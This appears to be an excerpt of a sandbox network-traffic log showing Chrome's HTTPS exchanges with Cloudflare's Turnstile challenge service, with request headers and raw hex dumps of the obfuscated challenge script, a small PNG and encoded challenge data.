                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 48 28 33 31 34 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 48 28 38 36 31 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 33 32 36 38 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 39 39 38 29 5d 2c 65 4d 5b 67 49 28 33 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 57 2c 65 29 7b 65 3d 28 67 57 3d 67 49 2c 7b 27 76 41 6d 54 64 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 67 57 28 31 34 33 31 29 5d 28 65 51 2c 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75
                                                                                                                                                                                                                                Data Ascii: H(314))/11*(parseInt(gH(861))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,932685),eM=this||self,eN=eM[gI(998)],eM[gI(335)]=function(c,gW,e){e=(gW=gI,{'vAmTd':function(g,h){return g(h)}});try{return e[gW(1431)](eQ,c)}catch(g){retu
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 58 28 31 33 39 35 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 59 29 7b 72 65 74 75 72 6e 20 67 59 3d 67 58 2c 64 5b 67 59 28 39 36 33 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 5a 29 7b 72 65 74 75 72 6e 20 67 5a 3d 67 59 2c 67 5a 28 34 38 39 29 5b 67 5a 28 31 33 39 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6f 2c 73 2c 68 30 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 29 7b 69 66 28 68 30 3d 67 58 2c 78 3d 7b 7d 2c 78 5b 68 30 28 31 33 31 39 29 5d 3d 68 30 28 34 31 36 29
                                                                                                                                                                                                                                Data Ascii: ':function(h,i){return h===i}},e=String[gX(1395)],f={'h':function(h,gY){return gY=gX,d[gY(963)](null,h)?'':f.g(h,6,function(i,gZ){return gZ=gY,gZ(489)[gZ(1399)](i)})},'g':function(j,o,s,h0,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P){if(h0=gX,x={},x[h0(1319)]=h0(416)
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 33 32 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 68 30 28 31 33 36 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 30 28 31 35 33 32 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 68 30 28 35 37 39 29 5d 28 38 2c 43 29 3b 4b 3d 64 5b 68 30 28 39 36 31 29 5d 28 64 5b 68 30 28 37 32 33 29 5d 28 4b 2c 31 29 2c 50 26 31 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 68 30 28 31 33 36 36 29 5d 28 64 5b 68 30 28 37 36 36 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 68 30 28 39 36 31 29 5d 28 4b 3c 3c 31 2e 30 31 2c 50 29 2c 4c 3d
                                                                                                                                                                                                                                Data Ascii: 32)](0)){for(C=0;C<I;K<<=1,L==o-1?(L=0,J[h0(1366)](s(K)),K=0):L++,C++);for(P=F[h0(1532)](0),C=0;d[h0(579)](8,C);K=d[h0(961)](d[h0(723)](K,1),P&1),L==o-1?(L=0,J[h0(1366)](d[h0(766)](s,K)),K=0):L++,P>>=1,C++);}else{for(P=1,C=0;C<I;K=d[h0(961)](K<<1.01,P),L=
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 34 28 37 35 30 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 34 28 38 38 35 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 34 28 31 30 35 30 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 68 34 28 31 30 37 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 34 28 35 36 34 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 34 28 31 34 31 37 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 34 28 38 38 35 29 5d 28 32 2c
                                                                                                                                                                                                                                Data Ascii: =0&&(H=j,G=o(I++)),J|=(d[h4(750)](0,L)?1:0)*F,F<<=1);switch(J){case 0:for(J=0,K=Math[h4(885)](2,8),F=1;d[h4(1050)](F,K);L=G&H,H>>=1,d[h4(1071)](0,H)&&(H=j,G=d[h4(564)](o,I++)),J|=d[h4(1417)](0<L?1:0,F),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[h4(885)](2,
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 31 35 37 33 29 5d 5b 68 35 28 34 38 38 29 5d 2c 27 5f 27 29 2c 30 29 2c 6c 3d 6c 5b 68 35 28 31 65 33 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 68 36 29 7b 68 36 3d 68 35 2c 6a 5e 3d 6c 5b 68 36 28 31 35 33 32 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 68 35 28 31 34 38 31 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 68 35 28 31 35 33 32 29 5d 28 2b 2b 69 29 29 3b 6b 5b 68 35 28 31 33 36 36 29 5d 28 53 74 72 69 6e 67 5b 68 35 28 31 33 39 35 29 5d 28 68 5b 68 35 28 31 31 31 35 29 5d 28 68 5b 68 35 28 37 31 36 29 5d 28 28 32 35 35 26 6d 29 2d 6a 2c 68 5b 68 35 28 31 31 31 35 29 5d 28 69 2c 36 35 35 33 35 29 29 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 68 35 28 31 32 35 35 29
                                                                                                                                                                                                                                Data Ascii: 1573)][h5(488)],'_'),0),l=l[h5(1e3)](/./g,function(n,s,h6){h6=h5,j^=l[h6(1532)](s)}),f=eM[h5(1481)](f),k=[],i=-1;!isNaN(m=f[h5(1532)](++i));k[h5(1366)](String[h5(1395)](h[h5(1115)](h[h5(716)]((255&m)-j,h[h5(1115)](i,65535))+65535,255))));return k[h5(1255)
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 64 2c 69 2c 6a 2c 6b 2c 6c 29 7b 66 6f 72 28 68 64 3d 67 49 2c 69 3d 4f 62 6a 65 63 74 5b 68 64 28 31 33 35 33 29 5d 28 68 29 2c 6a 3d 30 3b 6a 3c 69 5b 68 64 28 38 31 30 29 5d 3b 6a 2b 2b 29 69 66 28 6b 3d 69 5b 6a 5d 2c 6b 3d 3d 3d 27 66 27 26 26 28 6b 3d 27 4e 27 29 2c 67 5b 6b 5d 29 7b 66 6f 72 28 6c 3d 30 3b 6c 3c 68 5b 69 5b 6a 5d 5d 5b 68 64 28 38 31 30 29 5d 3b 2d 31 3d 3d 3d 67 5b 6b 5d 5b 68 64 28 35 39 39 29 5d 28 68 5b 69 5b 6a 5d 5d 5b 6c 5d 29 26 26 28 65 5a 28 68 5b 69 5b 6a 5d 5d 5b 6c 5d 29 7c 7c 67 5b 6b 5d 5b 68 64 28 31 33 36 36 29 5d 28 27 6f 2e 27 2b 68 5b 69 5b 6a 5d 5d 5b 6c 5d 29 29 2c 6c 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6b 5d 3d 68 5b 69 5b 6a 5d 5d 5b 68 64 28 37 31 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 72 65 74 75
                                                                                                                                                                                                                                Data Ascii: d,i,j,k,l){for(hd=gI,i=Object[hd(1353)](h),j=0;j<i[hd(810)];j++)if(k=i[j],k==='f'&&(k='N'),g[k]){for(l=0;l<h[i[j]][hd(810)];-1===g[k][hd(599)](h[i[j]][l])&&(eZ(h[i[j]][l])||g[k][hd(1366)]('o.'+h[i[j]][l])),l++);}else g[k]=h[i[j]][hd(718)](function(m){retu
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 28 39 33 30 29 5d 28 69 2c 31 32 37 29 2c 6c 3d 2b 74 68 69 73 2e 68 5b 6a 5e 31 33 31 5e 74 68 69 73 2e 67 5d 29 3a 65 5b 69 69 28 31 31 30 35 29 5d 28 31 38 31 2c 6b 29 3f 28 6b 3d 65 5b 69 69 28 34 34 32 29 5d 28 69 2c 31 31 30 29 2c 6c 3d 21 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 28 36 37 5e 6a 29 5d 29 3a 65 5b 69 69 28 31 31 30 35 29 5d 28 32 32 34 2c 6c 29 26 26 28 6b 3d 65 5b 69 69 28 31 32 30 33 29 5d 28 69 2c 31 32 32 29 2c 6c 3d 7e 74 68 69 73 2e 68 5b 6a 5e 32 30 37 2e 33 36 5e 74 68 69 73 2e 67 5d 29 3a 28 6b 3d 65 5b 69 69 28 31 35 34 38 29 5d 28 69 2c 31 30 30 29 2c 6c 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 68 5b 65 5b 69 69 28 38 33 31 29 5d 28 6a 2c 35 35 29 5e 74 68 69 73 2e 67 5d 29 2c 74 68 69 73 2e 68 5b 65 5b 69 69 28 39 33 30 29
                                                                                                                                                                                                                                Data Ascii: (930)](i,127),l=+this.h[j^131^this.g]):e[ii(1105)](181,k)?(k=e[ii(442)](i,110),l=!this.h[this.g^(67^j)]):e[ii(1105)](224,l)&&(k=e[ii(1203)](i,122),l=~this.h[j^207.36^this.g]):(k=e[ii(1548)](i,100),l=typeof this.h[e[ii(831)](j,55)^this.g]),this.h[e[ii(930)
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 35 32 29 5d 28 42 2c 6e 2c 21 21 5b 5d 29 2c 78 5b 69 6a 28 31 33 38 32 29 5d 3d 32 35 30 30 2c 78 5b 69 6a 28 38 35 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 78 5b 69 6a 28 31 34 37 36 29 5d 28 69 6a 28 31 35 30 29 2c 69 6a 28 33 34 33 29 29 2c 43 3d 7b 7d 2c 43 5b 69 6a 28 35 34 38 29 5d 3d 67 2c 43 2e 63 63 3d 68 2c 43 5b 69 6a 28 33 37 36 29 5d 3d 6c 2c 43 5b 69 6a 28 38 38 32 29 5d 3d 73 2c 44 3d 4a 53 4f 4e 5b 69 6a 28 31 30 35 37 29 5d 28 43 29 2c 45 3d 65 52 5b 69 6a 28 31 30 39 39 29 5d 28 44 29 5b 69 6a 28 31 65 33 29 5d 28 27 2b 27 2c 69 6a 28 38 33 32 29 29 2c 78 5b 69 6a 28 39 30 38 29 5d 28 6b 5b 69 6a 28 33 34 34 29 5d 28 6b 5b 69 6a 28 32 39 35 29 5d 28 6b 5b 69 6a 28 37 32 30 29 5d 28 27 76 5f 27 2c 65 4d 5b 69 6a 28 31 35 37 33
                                                                                                                                                                                                                                Data Ascii: 52)](B,n,!![]),x[ij(1382)]=2500,x[ij(856)]=function(){},x[ij(1476)](ij(150),ij(343)),C={},C[ij(548)]=g,C.cc=h,C[ij(376)]=l,C[ij(882)]=s,D=JSON[ij(1057)](C),E=eR[ij(1099)](D)[ij(1e3)]('+',ij(832)),x[ij(908)](k[ij(344)](k[ij(295)](k[ij(720)]('v_',eM[ij(1573


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                75192.168.2.449835104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd7ea7f73238a/1727989036537/D-jJSXgtibOEtnj HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd80b9f374394-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 52 08 02 00 00 00 89 c9 5e 60 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRGR^`IDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                76192.168.2.449836104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 32200
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 742272a500bdc81
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC16384OUTData Raw: 76 5f 38 63 63 66 64 37 65 61 37 66 37 33 32 33 38 61 3d 2d 46 4a 51 49 77 48 56 45 78 45 57 5a 33 35 50 61 50 34 78 4a 50 67 48 49 50 70 51 43 6f 33 56 50 39 4a 51 5a 6f 48 56 35 56 77 77 48 6b 50 2d 30 30 77 53 53 48 44 50 79 63 50 48 45 6f 77 48 31 50 78 46 48 24 36 51 77 76 74 50 41 30 77 4b 50 76 72 32 70 70 35 51 48 5a 4a 50 4c 34 39 42 50 41 61 51 77 58 50 46 66 53 52 52 4f 45 39 51 43 53 73 50 59 41 6a 49 4a 37 39 42 30 77 6b 50 57 4e 31 76 4f 35 35 50 50 5a 45 50 69 4e 48 30 35 51 48 72 50 34 69 42 47 6d 78 34 6f 35 43 47 4e 50 67 34 4b 66 59 4e 74 69 58 50 58 31 78 34 4a 35 24 42 70 4b 4d 58 50 68 76 30 56 79 6a 55 50 50 46 50 52 67 43 47 4c 49 49 53 6a 57 36 47 34 41 63 4d 52 38 50 50 4b 4b 6b 62 35 4b 72 6c 71 5a 72 4d 6b 58 4e 47 30 47 38 2d
                                                                                                                                                                                                                                Data Ascii: v_8ccfd7ea7f73238a=-FJQIwHVExEWZ35PaP4xJPgHIPpQCo3VP9JQZoHV5VwwHkP-00wSSHDPycPHEowH1PxFH$6QwvtPA0wKPvr2pp5QHZJPL49BPAaQwXPFfSRROE9QCSsPYAjIJ79B0wkPWN1vO55PPZEPiNH05QHrP4iBGmx4o5CGNPg4KfYNtiXPX1x4J5$BpKMXPhv0VyjUPPFPRgCGLIISjW6G4AcMR8PPKKkb5KrlqZrMkXNG0G8-
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC15816OUTData Raw: 41 6a 55 63 59 45 6e 4e 55 58 50 61 50 77 70 2b 4f 50 50 48 35 2b 4f 62 50 65 6a 50 47 50 2d 45 50 50 77 54 68 49 58 34 48 6a 30 46 42 78 50 48 75 30 69 6f 79 46 50 63 30 52 51 43 70 51 37 4a 35 51 79 50 59 51 48 73 45 36 46 50 51 50 70 50 79 51 57 75 51 42 2b 2d 74 49 31 50 48 50 2b 66 48 79 50 59 50 68 39 51 46 50 45 51 33 6f 77 62 5a 44 50 59 5a 77 46 50 4e 49 2b 30 77 77 50 4a 51 2b 5a 50 51 50 74 51 2b 65 50 58 50 67 51 77 45 77 59 50 4a 50 43 45 77 32 50 48 51 43 50 57 37 6f 71 51 2b 6c 4e 6b 50 2d 51 43 50 50 70 48 36 5a 50 6f 48 50 48 32 50 2b 53 77 44 50 69 6f 58 52 6f 39 47 76 4a 68 6f 50 4a 50 5a 50 50 4c 48 61 50 2b 56 78 61 47 69 6f 75 50 2d 53 50 76 51 71 4c 48 4f 57 6c 51 4e 30 58 4a 50 76 59 44 74 67 64 77 44 50 6f 51 43 4f 77 69 50 45 51
                                                                                                                                                                                                                                Data Ascii: AjUcYEnNUXPaPwp+OPPH5+ObPejPGP-EPPwThIX4Hj0FBxPHu0ioyFPc0RQCpQ7J5QyPYQHsE6FPQPpPyQWuQB+-tI1PHP+fHyPYPh9QFPEQ3owbZDPYZwFPNI+0wwPJQ+ZPQPtQ+ePXPgQwEwYPJPCEw2PHQCPW7oqQ+lNkP-QCPPpH6ZPoHPH2P+SwDPioXRo9GvJhoPJPZPPLHaP+VxaGiouP-SPvQqLHOWlQN0XJPvYDtgdwDPoQCOwiPEQ
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:20 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 26800
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: 75f8PYQLpLItAKbFd6meEbKTLjiyZWvDNB1jrQcOmcRhtcWgAeMkgMMtYHmxnR30N7WVKOUBmyCyvmXm$5xahD0oWXigdWxaD
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd80bdbfd4356-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1069INData Raw: 73 4b 31 34 6b 6f 69 38 6b 35 57 6c 7a 6f 61 66 72 4a 79 38 79 5a 36 4f 70 4d 57 51 72 73 62 4a 6c 4c 48 54 74 4e 61 32 72 61 7a 6a 78 71 57 30 75 71 65 6e 74 38 33 4c 77 2b 66 5a 71 2b 47 70 34 2b 33 78 77 37 6a 6d 78 62 4b 34 2b 62 79 34 76 72 50 68 75 66 4c 43 41 73 2f 48 76 39 58 44 78 51 76 41 32 77 6b 54 79 42 44 67 46 4d 33 6a 44 38 2f 4d 35 42 55 66 31 4e 7a 63 49 50 48 62 48 4e 76 59 38 53 45 72 34 4f 66 30 47 77 49 78 4a 52 2f 79 36 53 30 33 39 42 6b 42 4b 41 34 30 37 69 59 77 39 53 38 55 50 67 34 42 48 54 41 37 45 6a 5a 45 53 41 31 4c 47 6b 51 4e 4d 45 38 76 48 31 52 58 52 41 73 6e 4d 54 46 4c 57 78 73 35 50 30 34 65 4d 79 45 6d 5a 6a 74 66 59 56 74 42 58 7a 39 46 53 6d 4a 51 55 55 56 6c 62 46 42 6c 4c 31 4e 4e 55 58 74 58 63 33 78 2b 54 31 78
                                                                                                                                                                                                                                Data Ascii: sK14koi8k5WlzoafrJy8yZ6OpMWQrsbJlLHTtNa2razjxqW0uqent83Lw+fZq+Gp4+3xw7jmxbK4+by4vrPhufLCAs/Hv9XDxQvA2wkTyBDgFM3jD8/M5BUf1NzcIPHbHNvY8SEr4Of0GwIxJR/y6S039BkBKA407iYw9S8UPg4BHTA7EjZESA1LGkQNME8vH1RXRAsnMTFLWxs5P04eMyEmZjtfYVtBXz9FSmJQUUVlbFBlL1NNUXtXc3x+T1x
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 36 4c 53 33 4b 7a 4f 35 36 58 67 78 61 76 48 35 4d 33 30 79 76 6a 74 30 39 44 51 37 76 37 2b 36 76 4c 51 77 74 58 58 30 65 4c 7a 42 74 37 58 2f 76 7a 63 32 66 72 68 33 65 77 41 45 75 34 55 32 50 54 69 47 64 67 54 2f 68 50 77 44 2f 45 4f 48 79 41 59 38 50 41 47 39 66 55 62 37 41 2f 35 49 42 2f 76 37 54 51 57 4d 44 55 74 44 2f 4d 6d 4d 52 63 39 4b 66 6b 32 48 42 6b 5a 4e 68 59 7a 51 30 51 33 43 78 59 69 49 68 31 41 4b 69 41 65 4c 55 6b 7a 4d 69 46 46 56 31 78 64 55 44 38 74 54 30 46 68 4c 69 30 63 56 6a 42 6f 4d 6a 51 35 57 30 49 38 49 6d 30 78 54 54 39 6b 56 6b 4d 79 65 46 70 30 65 58 46 54 4f 47 70 31 57 34 46 74 50 6e 70 61 58 56 31 37 67 33 74 66 59 47 4f 4b 61 57 35 70 69 46 42 49 6a 59 64 6a 57 5a 6d 4e 64 34 61 4a 6f 59 71 4d 6a 47 35 65 63 58 53 6b
                                                                                                                                                                                                                                Data Ascii: 6LS3KzO56XgxavH5M30yvjt09DQ7v7+6vLQwtXX0eLzBt7X/vzc2frh3ewAEu4U2PTiGdgT/hPwD/EOHyAY8PAG9fUb7A/5IB/v7TQWMDUtD/MmMRc9Kfk2HBkZNhYzQ0Q3CxYiIh1AKiAeLUkzMiFFV1xdUD8tT0FhLi0cVjBoMjQ5W0I8Im0xTT9kVkMyeFp0eXFTOGp1W4FtPnpaXV17g3tfYGOKaW5piFBIjYdjWZmNd4aJoYqMjG5ecXSk
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 2f 76 37 4f 48 55 76 66 44 6c 32 50 50 36 73 72 48 6d 79 50 54 71 36 38 6e 33 7a 73 44 4e 2f 74 62 5a 30 51 58 42 78 37 2f 5a 77 66 37 78 33 77 7a 54 41 4f 6e 51 43 38 76 59 42 4e 4c 64 2b 66 73 53 2b 76 6f 46 37 68 6e 6d 2f 50 77 65 38 2f 6e 35 36 51 6b 4b 35 79 48 39 2f 4f 34 47 41 68 4c 34 4e 67 7a 7a 4f 42 54 2b 4e 43 72 36 48 7a 51 76 4d 51 42 49 53 53 59 57 47 54 73 34 4a 78 73 61 4f 31 45 67 55 31 41 31 4a 53 45 35 54 78 63 50 47 45 77 74 4b 31 34 5a 56 69 45 33 48 6c 6f 7a 51 32 4a 5a 62 6b 6b 35 4c 57 64 75 4c 47 64 49 51 6c 42 46 4e 32 64 6b 52 6d 77 30 50 56 49 2f 51 6f 46 73 50 6e 46 44 57 6c 64 39 53 32 46 68 67 6c 68 65 58 6b 35 74 62 6b 79 46 59 6c 61 49 61 6d 5a 32 69 4a 70 32 6c 6e 4b 65 58 61 53 53 6c 6f 69 6c 58 34 52 2b 71 32 56 6f 67
                                                                                                                                                                                                                                Data Ascii: /v7OHUvfDl2PP6srHmyPTq68n3zsDN/tbZ0QXBx7/Zwf7x3wzTAOnQC8vYBNLd+fsS+voF7hnm/Pwe8/n56QkK5yH9/O4GAhL4NgzzOBT+NCr6HzQvMQBISSYWGTs4JxsaO1EgU1A1JSE5TxcPGEwtK14ZViE3HlozQ2JZbkk5LWduLGdIQlBFN2dkRmw0PVI/QoFsPnFDWld9S2FhglheXk5tbkyFYlaIamZ2iJp2lnKeXaSSloilX4R+q2Vog
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 70 71 63 58 68 38 4d 2f 50 32 37 6e 54 39 76 33 78 2b 38 51 42 39 66 44 68 42 66 6e 30 2b 77 6e 39 2b 42 41 4e 41 76 33 64 45 51 62 33 42 42 54 70 48 65 30 57 39 52 33 31 38 76 66 31 42 4e 7a 64 4b 42 37 32 47 51 6e 2b 4b 53 54 6f 44 53 34 6c 4a 69 6b 79 43 79 49 47 4e 67 38 63 48 43 63 6e 38 52 45 2f 51 77 41 74 4e 52 38 6f 50 30 59 62 4f 69 4d 58 50 79 59 68 55 78 30 64 55 6b 64 56 4c 45 46 51 58 43 59 31 4c 78 38 2b 53 68 67 61 56 43 4d 7a 55 6b 55 37 58 57 41 6c 58 32 70 63 58 43 30 37 4d 57 64 6e 55 56 38 71 53 58 4e 36 4f 47 56 74 56 32 46 55 67 6c 31 31 59 58 61 45 55 48 65 45 57 31 52 57 69 46 31 6f 53 49 39 67 54 33 47 48 6c 57 4b 42 69 6d 53 45 64 34 78 70 58 58 75 51 62 6e 6c 77 6c 59 47 4a 6c 70 6d 48 65 6f 75 66 66 59 61 41 66 57 75 77 67 49
                                                                                                                                                                                                                                Data Ascii: pqcXh8M/P27nT9v3x+8QB9fDhBfn0+wn9+BANAv3dEQb3BBTpHe0W9R318vf1BNzdKB72GQn+KSToDS4lJikyCyIGNg8cHCcn8RE/QwAtNR8oP0YbOiMXPyYhUx0dUkdVLEFQXCY1Lx8+ShgaVCMzUkU7XWAlX2pcXC07MWdnUV8qSXN6OGVtV2FUgl11YXaEUHeEW1RWiF1oSI9gT3GHlWKBimSEd4xpXXuQbnlwlYGJlpmHeouffYaAfWuwgI
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 75 2f 53 2f 73 75 37 6a 77 2b 37 7a 31 38 2f 62 36 74 33 54 35 66 7a 37 36 77 4d 4e 34 75 72 38 35 63 67 44 47 67 55 5a 44 75 33 54 33 66 48 66 36 74 6f 4f 47 51 4d 6e 45 41 6a 67 34 53 77 6a 47 52 6f 77 4d 4f 38 70 38 2b 59 6a 47 50 63 6a 4b 41 77 45 45 43 30 57 43 66 67 33 46 68 4e 44 52 43 63 44 4e 68 30 59 46 6a 70 43 42 79 70 52 45 67 6b 31 54 55 56 51 55 45 63 6c 53 55 35 50 54 42 34 31 56 54 4d 64 4f 52 35 61 4f 56 30 66 58 6b 67 70 4c 46 67 37 4c 79 35 45 63 57 64 73 63 6c 42 48 61 6d 51 31 5a 6b 35 48 55 6c 6b 36 64 57 75 46 51 33 32 41 55 46 52 6d 69 31 31 6f 58 6f 5a 39 62 47 31 6e 67 30 32 50 61 6d 65 49 59 6e 56 6c 54 33 70 70 6e 32 6d 58 58 36 42 78 70 48 61 47 6b 36 53 59 64 33 61 66 6e 6d 2b 72 6a 6f 52 38 69 49 2b 4b 6f 72 4f 37 69 37 6d
